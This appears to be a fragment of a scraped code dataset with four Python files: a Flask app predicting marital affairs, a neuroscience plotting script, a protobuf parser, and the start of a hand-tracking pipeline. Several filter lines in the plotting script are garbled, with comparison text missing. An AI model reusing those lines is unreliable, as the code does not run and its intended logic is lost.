"call"}]} +{"seq_id": "8506577518", "text": "from wsgiref import simple_server\r\nfrom flask import Flask, request, app,render_template\r\nfrom flask import Response\r\nfrom flask_cors import CORS\r\nfrom logistic_deploy import predObj\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\napp.config['DEBUG'] = True\r\n\r\n\r\nclass ClientApi:\r\n\r\n def __init__(self):\r\n self.predObj = predObj()\r\n\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\ndef predictRoute():\r\n try:\r\n rateMarriage=int(request.form['rateMarriage'])\r\n age = int(request.form['age'])\r\n yearsMarried = int(request.form['yearsMarried'])\r\n children = int(request.form['children'])\r\n education = int(request.form['education'])\r\n occupation = int(request.form['occupation'])\r\n husbandOccupation = int(request.form['husbandOccupation'])\r\n religious = int(request.form['religious'])\r\n occ_2 = 0\r\n occ_3=0\r\n occ_4=0\r\n occ_5=0\r\n occ_6=0\r\n occ_husb_2=0\r\n occ_husb_3=0\r\n occ_husb_4=0\r\n occ_husb_5=0\r\n occ_husb_6=0\r\n if occupation == 2:\r\n occ_2 = 1\r\n elif occupation == 3:\r\n occ_3 = 1\r\n elif occupation == 4:\r\n occ_4 = 1\r\n elif occupation == 5:\r\n occ_5 = 1\r\n elif occ_6 == 6:\r\n occ_6 = 1\r\n else:\r\n print(occupation)\r\n \r\n if husbandOccupation == 2:\r\n occ_husb_2 = 1\r\n elif husbandOccupation == 3:\r\n occ_husb_3 = 1\r\n elif husbandOccupation == 4:\r\n occ_husb_4 = 1\r\n elif husbandOccupation == 5:\r\n occ_husb_5 = 1\r\n elif husbandOccupation == 6:\r\n occ_husb_6 = 1\r\n else:\r\n print(husbandOccupation)\r\n data = [[1,occ_2,occ_3,occ_4,occ_5,occ_6,occ_husb_2,occ_husb_3,occ_husb_4,occ_husb_5,occ_husb_6,rateMarriage,age,yearsMarried,children,religious,education]]\r\n print('data is: ', data)\r\n pred=predObj()\r\n res = pred.predict_log(data)\r\n\r\n print('result is ',res)\r\n return render_template('result.html', prediction_text='{}'.format(res))\r\n except ValueError:\r\n return Response(\"Value not found\")\r\n except Exception as e:\r\n print('exception is ',e)\r\n return Response(e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n clntApp = ClientApi()\r\n #host = '0.0.0.0'\r\n #port = 5000\r\n app.run(debug=True)", "repo_name": "tejasjbansal/Woman-Affair-Prediction", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.app", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask.app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "flask.app", "line_number": 9, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.app.run", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "38276237285", "text": "from matplotlib import pyplot as plt\nfrom collections import Counter\nfrom jaratest.nick.stats import am_funcs\nreload(am_funcs)\nimport pandas\nimport numpy as np\nfrom jaratoolbox import colorpalette\nfrom jaratoolbox import extraplots\nimport matplotlib\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nimport matplotlib.pyplot as plt\n# import seaborn\n\n\nthaldbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/thalamusdb_q10.pickle'\ncortdbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/cortexdb_q10.pickle'\nthaldb = pandas.read_pickle(thaldbfn)\ncortdb = pandas.read_pickle(cortdbfn)\n\nlaserTrainThresh = 1.5\nnoiseBurstThresh = 2\nisiThresh = 4\n\nthalNonID = thaldb[(thaldb['isiViolations']noiseBurstThresh) & (thaldb['lasertrainZ']noiseBurstThresh) & (cortdb['lasertrainZ']noiseBurstThresh) & (thaldb['lasertrainZ']>laserTrainThresh)]\ncortID = cortdb[(cortdb['isiViolations']noiseBurstThresh) & (cortdb['lasertrainZ']>laserTrainThresh)]\n\nthalamHSNonID = thalNonID['highestSync']\ncortamHSNonID = cortNonID['highestSync']\n\nthalamHSID = thalID['highestSync']\ncortamHSID = cortID['highestSync']\n\n\n\n# Percentage of neurons that sync to the freqs we tested\nlowFreq = 4\nhighFreq = 128\nnFreqs = 11\nfreqs = np.logspace(np.log10(lowFreq),np.log10(highFreq),nFreqs)\nfreqs = np.round(freqs, decimals=1)\nfreqs = np.r_[0, freqs]\n\nthalHighestNonID = np.round(thalamHSNonID.dropna(), decimals=1)\nthalHighestID = np.round(thalamHSID.dropna(), decimals=1)\nnThal = len(thalHighestNonID) + len(thalHighestID)\n\ncortHighestNonID = np.round(cortamHSNonID.dropna(), decimals=1)\ncortHighestID = np.round(cortamHSID.dropna(), decimals=1)\nnCort = len(cortHighestNonID) + len(cortHighestID)\n\nthalCounterNonID = Counter(thalHighestNonID)\nthalCounterID = Counter(thalHighestID)\n\ncortCounterNonID = Counter(cortHighestNonID)\ncortCounterID = Counter(cortHighestID)\n\nthalcountsNonID = [100*thalCounterNonID[freq]/np.double(nThal) for freq in freqs]\nthalcountsID = [100*thalCounterID[freq]/np.double(nThal) for freq in freqs]\n\ncortcountsNonID = [100*cortCounterNonID[freq]/np.double(nCort) for freq in freqs]\ncortcountsID = [100*cortCounterID[freq]/np.double(nCort) for freq in freqs]\n\nindex = np.arange(len(freqs))\nbar_width=0.35\nplt.clf()\nfig = plt.gcf()\nfig.set_size_inches(10.5, 3.7)\nlinewidth=2\nfontsize=20\n\nrects11 = plt.bar(index,\n thalcountsID,\n bar_width,\n label='Tagged thalamo-striatal',\n facecolor=colorpalette.TangoPalette['Orange2'],\n edgecolor=colorpalette.TangoPalette['Orange2'],\n linewidth = linewidth)\n\nrects12 = plt.bar(index,\n thalcountsNonID,\n bar_width,\n label='Thalamus, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Orange2'],\n bottom=thalcountsID,\n linewidth=linewidth)\n\nrects21 = plt.bar(index+bar_width+0.04,\n cortcountsID,\n bar_width,\n label='Tagged cortico-striatal',\n facecolor=colorpalette.TangoPalette['Plum2'],\n edgecolor=colorpalette.TangoPalette['Plum2'],\n linewidth=linewidth)\n\nrects22 = plt.bar(index+bar_width+0.04,\n cortcountsNonID,\n bar_width,\n label='Cortex, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Plum2'],\n bottom=cortcountsID,\n linewidth=linewidth)\n\nplt.xlabel('Maximum AM rate to which responses\\nwere synchronized (Hz)', fontsize=fontsize)\nplt.ylabel('% Neurons', fontsize=fontsize)\n# plt.title('Scores by group and gender')\nplt.xticks(index + bar_width, freqs)\nplt.legend(loc='upper left', prop={'size':15})\nplt.tight_layout()\nax = plt.gca()\nax.set_yticks(np.linspace(0, 40, 5))\nextraplots.set_ticks_fontsize(ax, fontsize)\nextraplots.boxoff(ax)\n\nplt.show()\n\n# Dependence of mean FR on AM rate\n# thalamR = thalCells['amRval']\n# cortamR = cortCells['amRval']\n# plt.clf()\n# plt.plot(np.random.normal(1, 0.05, len(thalamR.dropna())), thalamR.dropna(), '.', ms=10)\n# plt.hold(True)\n# plt.plot(np.random.normal(3, 0.05, len(cortamR.dropna())), cortamR.dropna(), '.', ms=10)\n# plt.xlim([0.5, 3.5])\n# ax = plt.gca()\n# ax.set_xticks([1, 3])\n# ax.set_xticklabels(['Thalamus', 'Cortex'])\n# plt.ylabel('Correlation coefficient between\\nfiring rate and AM rate')\n# plt.show()\n\n### EXAMPLE NEURON HUNT\n# corrCells = thalCells[np.abs(thalCells['amRval'])>0.5]\n# corrCells = cortCells[np.abs(cortCells['amRval'])>0.5]\n\n# for indCell, cell in corrCells.iterrows():\n# plt.clf()\n# try:\n# sessiontypeIndex = cell['sessiontype'].index('AM')\n# except ValueError: #The cell does not have this session type\n# continue\n# print indCell\n# # r_val, frArray = am_funcs.am_dependence(cell, frArray=True)\n# # plt.plot(frArray)\n# # plt.waitforbuttonpress()\n# plt.subplot(3, 1, 1)\n# am_funcs.plot_am_raster(cell)\n# plt.subplot(3, 1, 2)\n# am_funcs.plot_am_psth(cell)\n# plt.subplot(3, 1, 3)\n# r_val, frArray, possibleFreq = am_funcs.am_dependence(cell, frArray=True)\n# plt.plot(frArray)\n# ax = plt.gca()\n# ax.set_xticks(np.arange(len(possibleFreq)))\n# ax.set_xticklabels(np.round(possibleFreq, decimals=1))\n# plt.xlabel(r_val)\n# plt.waitforbuttonpress()\n", "repo_name": "sjara/jaratest", "sub_path": "nick/analysis/poster_ephys/am_stats_plot.py", "file_name": "am_stats_plot.py", "file_ext": "py", "file_size_in_byte": 5693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "jaratest.nick.stats.am_funcs", "line_number": 4, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 78, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 78, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 79, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 87, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 95, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 95, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 104, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 115, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots.set_ticks_fontsize", "line_number": 116, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 116, "usage_type": "name"}, {"api_name": "jaratoolbox.extraplots.boxoff", "line_number": 117, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "36766905246", "text": "import logging\n\nlog = logging.getLogger(__name__)\n\n\nclass ProtoParser:\n def __init__(self, filename):\n with open(filename, 'r') as f:\n data = f.read()\n\n lines = data.split('\\n')\n tokens = []\n for line in lines:\n if line.startswith('//'):\n continue\n\n if line.startswith('syntax'):\n continue\n\n if line.startswith('option'):\n continue\n\n line = line.replace('\\t', ' ')\n tokens.extend(line.split(' '))\n\n self.tokens = []\n for t in tokens:\n if t not in ('', ' '):\n self.tokens.append(t)\n\n self.nested_message = []\n self.path = dict()\n self.old = dict()\n self.type_order = dict()\n self.type_array = []\n self.messages = []\n self.pos = 0\n\n def next(self):\n self.pos += 1\n return self.token()\n\n def token(self):\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n return None\n\n def has_tokens(self):\n return self.pos < len(self.tokens)\n\n def parse(self):\n while self.has_tokens():\n tok = self.token()\n\n if tok == 'message':\n self.parse_message()\n\n elif tok == 'enum':\n self.parse_enum()\n\n else:\n print(f'dont know how to parse `{tok}`')\n\n def parse_oneof(self):\n self.expect('oneof')\n name = self.next()\n\n self.next(), self.expect('{')\n fields = []\n\n tok = self.next()\n while tok != '}':\n fields.append(self.parse_field())\n tok = self.token()\n\n self.expect('}'), self.next()\n\n print(name, name in self.type_order)\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n self.messages.append(('O', name, fields))\n\n fname = name[0].lower() + name[1:]\n return 'F', 0, fname, name, ''\n\n def parse_field(self):\n qualifier = ''\n tok = self.token()\n\n if tok in ('optional', 'required', 'repeated'):\n qualifier = tok\n field_type = self.next() \n elif tok == 'oneof':\n return self.parse_oneof()\n else:\n field_type = tok\n \n field_name = self.next()\n\n self.next(), self.expect('=')\n field_id = self.next() \n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n # start of the [default ....]; stuff\n elif tok[0] == '[':\n tok = self.token()\n while tok[-1] != ';':\n tok = self.next()\n self.next()\n\n elif field_id[-1] == ';':\n field_id = field_id[:-1]\n\n new_name = field_type.split('.')[-1]\n if new_name not in self.type_order:\n self.type_order[new_name] = len(self.type_order)\n self.type_array.append(new_name)\n \n log.debug(f'parse field {qualifier} {field_name}: {field_type} = {field_id}')\n return 'F', field_id, field_name, field_type, qualifier\n\n def parse_enum_field(self):\n name = self.token()\n self.next(), self.expect('=')\n value = self.next()\n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n elif value[-1] == ';':\n value = value[:-1]\n\n return name, value\n\n def expect(self, c):\n t = self.token()\n assert t == c, f'Expected `{c}` got `{t}`'\n\n def parse_enum(self):\n self.expect('enum')\n name = self.next()\n\n log.debug(f'>> parsing enum {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n tok = self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n fname, fvalue = self.parse_enum_field()\n fields.append((fname, fvalue))\n tok = self.token()\n\n self.expect('}'), self.next()\n self.messages.append(('E', name, fields))\n self.nested_message.pop()\n\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n def parse_message(self):\n self.expect('message')\n name = self.next()\n\n log.debug(f'>> parsing message {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n if tok == 'message':\n self.parse_message()\n tok = self.token()\n continue\n\n if tok == 'enum':\n self.parse_enum()\n tok = self.token()\n continue\n\n fields.append(self.parse_field())\n tok = self.token()\n \n self.expect('}'), self.next()\n self.nested_message.pop()\n self.messages.append(('M', name, fields))\n \n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n p = ProtoParser('C:/Users/Newton/work/luafun/luafun/game/dota2/dota_gcmessages_common_bot_script.proto')\n p.parse()\n print(p.messages)\n", "repo_name": "Delaunay/dota2env", "sub_path": "luafun/utils/proto_parser.py", "file_name": "proto_parser.py", "file_ext": "py", "file_size_in_byte": 5757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 213, "usage_type": "attribute"}]} +{"seq_id": "30612429975", "text": "# Source :\r\n# https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data\r\n# https://github.com/nicknochnack/YOLO-Drowsiness-Detection/blob/main/Drowsiness%20Detection%20Tutorial.ipynb\r\n# https://github.com/tzutalin/labelImg\r\n\r\n\r\n# Label Image - \"myhand\" environment\r\n# -----------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\labelImg\r\n# python labelImg.py\r\n\r\n# YoLoV5 Training - \"mybrain\" environment\r\n# ---------------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\r\n# python train.py --img 320 --batch 16 --epochs 100 --data dataset.yaml --weights yolov5s.pt --workers 2\r\n\r\n\r\n#Install and Import Dependencies\r\n\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport math\r\nimport time\r\n\r\n# Create CSV file\r\nimport csv\r\n\r\nheader_ang = [ 'timer', 'timer_task', \r\n 'angle01', 'angle02', 'angle03', \r\n 'angle11', 'angle12', 'angle13',\r\n 'angle21', 'angle22', 'angle23', \r\n 'angle31', 'angle32', 'angle33',\r\n 'angle41', 'angle42', 'angle43', 'task_state', 'thumb_state', ] \r\n \r\ncsvfile_ang = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_angle.csv', 'w')\r\nwriter_ang = csv.writer(csvfile_ang, delimiter = ',', lineterminator='\\n')\r\nwriter_ang.writerow(header_ang)\r\n\r\nheader_sta = [ 'timer', 'timer_task', 'grasp_type', 'rotate_type', 'box_near_hand'] \r\n \r\ncsvfile_sta = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_status.csv', 'w')\r\nwriter_sta = csv.writer(csvfile_sta, delimiter = ',', lineterminator='\\n')\r\nwriter_sta.writerow(header_sta)\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP Graph Neural Networks\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn import Linear\r\n\r\ndataset_num_node_features = 1\r\ndataset_num_classes = 7\r\n\r\n# Training with GCNConv\r\nfrom torch_geometric.data import Data\r\n\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import global_mean_pool\r\n\r\n\"\"\"\"\"\"\r\nclass GCN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GCN, self).__init__()\r\n torch.manual_seed(12345)\r\n self.conv1 = GCNConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GCNConv(hidden_channels, hidden_channels)\r\n self.conv3 = GCNConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch): #\r\n # 1. Obtain node embeddings \r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n # 2. Readout layer\r\n x = global_mean_pool(x, batch) # [batch_size, hidden_channels]\r\n\r\n # 3. Apply a final classifier\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Training with GraphConv\r\n\r\nfrom torch_geometric.nn import GraphConv\r\n\r\nclass GNN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GNN, self).__init__()\r\n torch.manual_seed(12345)\r\n\r\n self.conv1 = GraphConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GraphConv(hidden_channels, hidden_channels)\r\n self.conv3 = GraphConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch):\r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n x = global_mean_pool(x, batch)\r\n\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Device configuration\r\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\n\r\n# Defining ANN Architechture\r\nmodel_gnn = GNN(hidden_channels=64)\r\nmodel_gnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_grasppose_gnn.pkl\"))\r\nmodel_gnn.to(device)\r\nmodel_gnn.eval()\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model_gnn.parameters(), lr=0.01)\r\n\r\n# Data Preprocessing\r\nedge_index = torch.tensor([[0, 1], #[1, 0],\r\n [1, 2], #[2, 1],\r\n [2, 3], #[3, 2],\r\n [0, 4], #[4, 0],\r\n [4, 5], #[5, 4],\r\n [5, 6], #[6, 5],\r\n [0, 7], #[7, 0],\r\n [7, 8], #[8, 7],\r\n [8, 9], #[9, 8],\r\n [0, 10], #[10, 0],\r\n [10, 11], #[11, 10],\r\n [11, 12], #[12, 11],\r\n [0, 13], #[13, 0],\r\n [13, 14], #[14, 13],\r\n [14, 15] #[15, 14] \r\n ],dtype=torch.long)\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP NEURAL NETWORKS RNN\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass RNN(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\r\n super(RNN, self).__init__()\r\n self.num_layers = num_layers\r\n self.hidden_size = hidden_size\r\n\r\n # -> x needs to be: (batch_size, seq, input_size)\r\n\r\n #self.rnn = nn.RNN(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< RNN\r\n # or:\r\n self.gru = nn.GRU(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< GRU\r\n #self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< LSTM\r\n \r\n self.fc = nn.Linear(hidden_size, num_classes)\r\n \r\n def forward(self, x):\r\n # Set initial hidden states (and cell states for LSTM)\r\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) \r\n #c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) # <<<<<<<<<<< LSTM\r\n \r\n # x: (n, 28, 28), h0: (2, n, 128)\r\n \r\n # Forward propagate RNN\r\n #out, _ = self.rnn(x, h0) # <<<<<<<<<<< RNN\r\n # or:\r\n #out, _ = self.lstm(x, (h0,c0)) # <<<<<<<<<<< LSTM\r\n # or:\r\n out, _ = self.gru(x, h0) # <<<<<<<<<<< GRU\r\n \r\n # out: tensor of shape (batch_size, seq_length, hidden_size)\r\n # out: (n, 28, 128)\r\n \r\n # Decode the hidden state of the last time step\r\n out = out[:, -1, :]\r\n # out: (n, 128)\r\n \r\n out = self.fc(out)\r\n # out: (n, 10)\r\n return out\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters \r\nnum_classes = 7\r\nnum_epochs = 50\r\nbatch_size = 1\r\nlearning_rate = 0.001\r\n\r\ninput_size = 15\r\nsequence_length = 10\r\nhidden_size = 128\r\nnum_layers = 2\r\n\r\n# Defining ANN Architechture\r\nmodel_rnn = RNN(input_size, hidden_size, num_layers, num_classes).to(device)\r\nmodel_rnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_gru.pkl\"))\r\nmodel_rnn.to(device)\r\nmodel_rnn.eval()\r\n\r\nimport collections\r\ncoll_hand = collections.deque(maxlen=sequence_length)\r\n\r\nimport pickle\r\nsc_input = pickle.load(open(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\scaler_input.pkl\",'rb'))\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HAND TRACKING : MEDIAPIPE\r\n\r\n### HAND TRACKING: SETUP\r\n\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\njoint_list_0 = [[2,1,0], [3,2,1], [4,3,2]]\r\njoint_list_1 = [[6,5,0], [7,6,5], [8,7,6]]\r\njoint_list_2 = [[10,9,0], [11,10,9], [12,11,10]]\r\njoint_list_3 = [[14,13,0], [15,14,13], [16,15,14]]\r\njoint_list_4 = [[18,17,0], [19,18,17], [20,19,18]]\r\n\r\n### HAND TRACKING: FUCTION \r\n\r\ndef get_label(index, hand, results):\r\n output = None\r\n for idx, classification in enumerate(results.multi_handedness):\r\n if classification.classification[0].index == index:\r\n \r\n # Process results\r\n label = classification.classification[0].label\r\n score = classification.classification[0].score\r\n text = '{} {}'.format(label, round(score, 2))\r\n \r\n # Extract Coordinates\r\n coords = tuple(np.multiply(\r\n np.array((hand.landmark[mp_hands.HandLandmark.WRIST].x, 